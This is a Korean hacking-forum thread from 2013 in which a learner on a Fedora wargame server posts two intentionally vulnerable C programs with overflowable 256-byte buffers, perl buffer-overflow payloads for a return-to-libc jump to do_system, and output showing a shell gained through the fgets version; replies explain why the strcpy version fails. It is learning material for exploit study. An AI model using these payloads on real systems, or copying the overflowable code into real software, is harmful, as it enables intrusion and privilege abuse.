리눅스

3916,

1/196

kumi123

do_system 궁금한 것이 잇습니다.

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=4329 [복사]

[dark_eyes@Fedora_1stFloor ~]$ cat a.c
#include <stdio.h>

int main(int argc, char* argv[])
{
        char buf[256];
        fgets(buf, 300, stdin);

        printf("%s \n", buf);

        return 0;
}

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x84\x07\x75\x00"';cat)| ./a

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA꼞

id
uid=502(dark_eyes) gid=502(dark_eyes) groups=502(dark_eyes) context=user_u:system_r:unconfined_t

do_system rtl 성공 ( + gets 도 )

하지만,

[dark_eyes@Fedora_1stFloor ~]$ cat b.c
#include <stdio.h>
#include "dumpcode.h"
int main(int argc, char* argv[])
{
        char buf[256];

        strcpy(buf, argv[1]);

        printf("%s \n", buf);

        dumpcode(buf, 300);
        return 0;
}

strcpy의 경우

./b `perl -e 'print "A"x268, "\x84\x07\x75\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA꼞
./b: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA꼞: File name too long

gets, fgets --> do_system rtl 성공

strcpy, strncpy --> 실패

이유가 뭘까요??

Hit : 4189 Date : 2013/08/22 04:00


chlxogns92	제 환경에선 둘다 exploit이 안되네요.. 근데, 원래 do_system의 인자는 eax로 들어가는거니까, main함수를 return 0으로 종료하면 exploit이 안되야 정상아닌가요?	2013/08/23
blueh4g	적어주신 글에 답이 있는거같아요 ^^; filename too long	2013/08/23
kumi123	- chlxogns92 페도라3만 되더군요.. 레드햇9 ~ 페도라2 (x) 페도라4 (x) 현재까지는 이렇습니다.	2013/08/26
kumi123	- blueh4g strpcy의 경우에는, main에 ebp ret argc argv 구조에서 do_system이 argv를 참조 하는거군요.. gets() 계열은, 임시버퍼에 파일을 저장했다가 복사를 하니, argv 자리에, 파일명이 짧아지는 군요. 알고나면 이렇게 간단한 이유데 ㅠㅠ, 감사합니다. ^^ 좋은거 또 배우고 가네요..	2013/08/26